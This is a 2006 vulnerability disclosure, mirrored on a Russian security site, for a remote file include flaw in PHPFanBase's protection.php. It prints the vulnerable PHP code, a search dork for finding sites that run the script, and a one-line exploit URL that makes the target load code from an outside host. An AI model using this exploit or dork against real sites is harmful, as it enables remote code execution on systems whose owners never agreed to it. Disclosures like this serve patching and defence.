Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [SA23406] Novell NetWare Welcome web-app Cross-Site Scripting Vulnerability

  [SA23388] eyeOS File Upload Vulnerability

  cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability

  cwmVote 1.0 File Include Vulnerability

From:Cold Zero <c.o.1.d.0_(at)_hotmail.com>
Date:20 декабря 2006 г.
Subject:PHPFanBase (protection.php) Remote File Include Vulnerability

--------------------------------------||    Viva Palestine     ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien  ||-----------------------------------------


PHPFanBase (protection.php) Remote File Include Vulnerability

Found By  :  CoLd Zero  [ Wasem898 ]
Source    :  www.4azhar.com
           SpECiALPowEr.oRg
           A_mal Team

PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif

######################################################
#
#            PHPFanBase ]All[
#
# Class:     Remote File Include Vulnerability
# Published  2006-12-19
# Remote:    Yes
# Type:      Dangerous
# Site:      http://codegrrl.com/!/scripts/
#
# Author:    Cold Zero
# Contact:   [email protected]
#
# Dork: Powered By PHPFanBase
######################################################

File :

/protection.php

===========================

<?


$user_passwords = array (

      "$admin_username" => "$admin_password"  );

// This is the page to show when the user has been logged out
$logout_page = "$siteurl";

// Page with login form
$login_page = "login.php";

// Page to show if the user enters an invalid login name or password
$invalidlogin_page = "invalidlogin.php";


//DON'T EDIT ANYTHING BELOW THIS!!!

if ($action == "logout")
{
      Setcookie("logincookie[pwd]","",time() -86400);
      Setcookie("logincookie[user]","",time() - 86400);
      include($logout_page);
      exit;
}
else if ($action == "login")
{
      if (($loginname == "") || ($password == ""))
      {
              include($invalidlogin_page);
              exit;
      }
      else if (strcmp($user_passwords[$loginname],$password) == 0)
      {
              Setcookie("logincookie[pwd]",$password,
time() + 86400);
              Setcookie("logincookie[user]",$loginname,
time() + 86400);
      }
      else
      {
              include($invalidlogin_page);
              exit;
      }
}
else
{
      if (($logincookie[pwd] == "") || ($logincookie[user] == ""))
      {
              include($login_page);
              exit;
      }
      else if
(strcmp($user_passwords[$logincookie[user]],$logincookie[pwd]) =
= 0)
      {
              Setcookie("logincookie[pwd]",$logincookie[pwd],
time() +
86400);
              Setcookie("logincookie[user]",$logincookie[user],
time() +
86400)
;
      }
      else
      {
              include($invalidlogin_page);
              exit;
      }
}


===========================

Exploit :

Http://www.Victem.0/[PaTH]/protection.php?action=logout&siteurl=http://4azhar.com/soft.txt?


======================================================

----  GreeTz: [MoHaNdKo]  [Cold One]  [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [[email protected]] [Snake12][Root Shell]
            [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[  Everyone I know


****************************************************************
# *www.4azhar.com Securty Team    >>      www.4azhar.com        *
# *SpeciaL PoweR SecuritY Team    >>      www.specialpower.org  *
# *A_mal Hacking Team             >>      -vv -l -p The-Pradise *
*****************************************************************


http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


--------------------------------------||    Viva Palestine     ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien  ||-----------------------------------------

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород